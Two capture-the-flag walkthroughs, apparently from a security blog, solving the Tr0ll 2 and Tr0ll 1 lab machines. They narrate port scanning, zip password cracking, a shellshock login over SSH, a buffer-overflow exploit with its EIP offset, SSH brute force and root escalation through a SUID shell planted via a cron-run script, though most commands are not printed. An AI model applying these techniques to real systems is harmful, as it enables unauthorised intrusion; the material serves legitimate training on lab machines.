Hack the Tr0ll 2 (Boot2Root Challenge)

Hello everyone and welcome to this CTF challenge. This is the next part to Tr0ll by Maleus. You can download the lab from here. The objective of this lab is to get root and read the flag.

The level of this challenge is not so tough and its difficulty level is described as beginner/intermediate.

Penetrating Methodologies

  • Network scanning (Nmap, Netdiscover)
  • Information Gathering
  • Analysing web source code
  • Get robort.txt
  • Directory enumeration with the help of robots.txt (Dirb)
  • Found encoded answer.txt file
  • Decoding base64 text file
  • FTP login for Zip file
  • Cracking zip file (Fcrackzip)
  • Exploiting shellshock to get shell in bash.
  • Spwan tty shell (Metasploit)
  • Privilege escalation
  • Finding vulnerable binary
  • Finding EIP offset
  • Exploiting buffer overflow
  • Getting root flag

So, let’s get started!

First step is as always, IP grabbing. In my case the IP was 192.168.1.131

Next step was port scanning and discovery of open ports using nmap.

And we found 3 ports open- 21, 22, 80

So, we tried to open the IP in browser to see what was in the web page and sure as hell, that troll face again! It really did live up to its name after all!

So, we opened the home page’s source code using curl:

We, then enumerated the IP using dirb to find something interesting and something did catch our eyes—robots.txt

So, we opened robots.txt in web browser and we saw a lot of directory names.

So, we downloaded robots.txt using wget and tried to make a dictionary out of it in hope that we find something good in one of them.

(Removed the ‘/’ from each line and saved it)

Enumerating it again with the custom dictionary we just made, few other directories were found.

So, we hit each directory on browser and inspected each image since there was nothing else to play with in the directories.

One by one we started searching each directory but nothing appealed to us. It all had the same troll image.

We checked the source code of the page but nothing seemed good.

 

 

Hence, we downloaded cat_the_troll.jpg from each directory but one such directory called dont_bother had something interesting in its image.

We read the last three lines of the image’s coding using tail command:

The code really said to look deep within “y0ur_self” to find the answer. Could it be a directory? lets find out.

Voila! It indeed is a directory and really has an answer in it. But on opening answer.txt, the dictionary seemed to be base64 encoded.

 

We again downloaded the answer.txt file using wget and decoded it into a new file decoded.txt

Decoded it using:

Let’s save this dictionary for future use and move on to another port we discovered—the FTP port.

We had no idea of the username and password and neither was there any password or username file found.

But remember the very first source code we viewed? It had the author name Tr0ll.

Could that be the username and default password for FTP?

It was a complete hit and try method but we successfully got logged in!

We found a zip file “lmao.zip” in FTP. But the zip had password protection.

Wait… what about the file we just decoded? Could it have password for the zip file?

We found the password!. Let’s unzip the file now.

And enter the password: ItCantReallybeThisEasyRightLOL

We had high curiosity about the file “noob”.

cat noob

Turned out, it was an RSA key to SSH

Without any delay we tried to login to SSH using this RSA key but we got trolled, yet again!

A complete arrow in the dark was to exploit shellshock vulnerability in SSH. So, we tried command:

And we got logged in!

But it isn’t a proper teletype. We used web delivery in metasploit to create a python shell to get a proper meterpreter session.

We copied above generated python code to the improper bash we just created.

On the other hand, we had got a meterpreter session.

Let’s get into the shell and try to spawn a proper teletype.

The r00t binary in these directory work differently, and change their behaviour with each other on every reboot. One of these binary (in our case it was in door2, it changes on reboot) accept a string as argument and print it.

We open the binary in gdb debugger to look at the assembly code for the binary. At main+71 we find a strcpy function, as strcpy function is vulnerable to buffer overflow we try to exploit it.

First we create a 500 bytes long string to find the EIP offset using patter_create script.

We run the file in gdb along with the 500-byte character as the argument and find that the EIP register was overwritten with 0x6a413969.

We pass that into /usr/share/metasploit-framework/tools/pattern_offset.rb, we get an offset of 268. So we need to write 268 characters and then write the address of the instructions we want to be executed.

After getting the offset we find the ESP and find it to be 0xbffffc70 but we create our exploit and execute it we get an error with illegal instruction that is because gdb has a different environment. Now we remove 1 byte and take the ESP to be 0xbffffc80. We run the binary by ignoring the environment along the exploit as the argument. As soon as we run the exploit we get a spawn a shell as root, we open the /root directory and find a file called Proof.txt. We take a look at the content of the files and find the final flag.

Author: Harshit Rajpal is an InfoSec researcher and a left and right brain thinker. contact here

Hack the Troll-1 VM (Boot to Root)

Hello friends today we are going to solve another CTF challenge “Troll 1” of the vulnhub labs. The level of this challenge is not so tough and its difficulty level is described as beginner/intermediate. You can download it from here https://www.vulnhub.com/entry/tr0ll-1,100/

Penetrating Methodology

  • Network Scanning (Nmap, netdiscover)
  • Anonymous FTP login
  • Abusing web browser
  • Brute-force attack (hydra)
  • SSH login
  • Privilege Escalation
  • Get root access
  • Capture the flag

Let’s Begin!!

Start with netdiscover command to identify target IP in the local network, in my network 192.168.1.102 is my target IP, you will get yours.

Further let’s enumerate open and protocols information in the target’s network with help of nmap following command:

From its result we found port 21 for FTP, 22 for SSH and 80 for HTTP are open. Moreover FTP anonymous login is allowed.

So we explore target IP in the web browser and welcomed by following image………………

Since FTP anonymous login was allowed so we logged in as anonymous: anonymous and download a lol.pcap file

When we opened lol.pcap file it was a wireshark TCP packet and when we have opened 1st TCP stream it put up following image as shown.

While looking in TCP stream 2, I notice something suspicious “sup3rs3cr3tdirlol” it could any possible web directory. So let’s step up for further approach and figure out what this sup3rs3cr3tdirlol indicates.

So when I explore http://192.168.1.102/sup3rs3cr3tdirlol in the web browser, it put up following web page where we found a file roflmao and decide to download it.  

Then with help of “string” a tool in kali Linux we explored the file roflmao and got a message ‘Find the address 0x0856BF to proceed

Then again I explored /0x0856BF in the web browser considering a possible web directory and indeed it gives two sub-directories as shown in the below image.

I opened both sub-directories and /good-luck looks interesting to me as it called a lol.txt file which contains a wordlist and might be this could be useful in conducting the brute force attack against ssh login. Also the folder /this_folder_contains_the_password gave hint “Pass.txt” could be possible password.

Then we copied lol.txt wordlist into a text file and saved as dict.txt for username (remove 5th line while pasting the content of lol.txt into dict.txt). Since we have username dictionary file and also well aware from password let’s lunch brute-force attack for ssh login and for this you can use following command.

OOOooooh Great!! Hhere is our possible ssh login credential overflow:Pass.txt

With help of above extracted credential we have made successful SSH login and spawned tty shell victim’s machine. Now let’s finished task quickly and for that we need to escalated root privileges……………. 

Then we have enumerated all writeable file with help of above command.

We found a python file cleaner.py inside /lib/log and it is a small program. So here the following script was added by admin to cleanup all junk file from inside /tmp and these type of files depends upon specific time interval for executions.

There so many methods to gain root access as in this method we copied /bin/sh inside /tmp and enabled SUID for /tmp/sh. It is quite simple, first, open the file through some editor for example nano sanitizer.py and replace“rm -r /tmp/*” from the following line as given below:

After some time it will create an sh file inside /tmp directory having SUID permission and when you will run it you will give root access.

HURRAYYYYYYY!!! We hit the Goal……………………………….

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...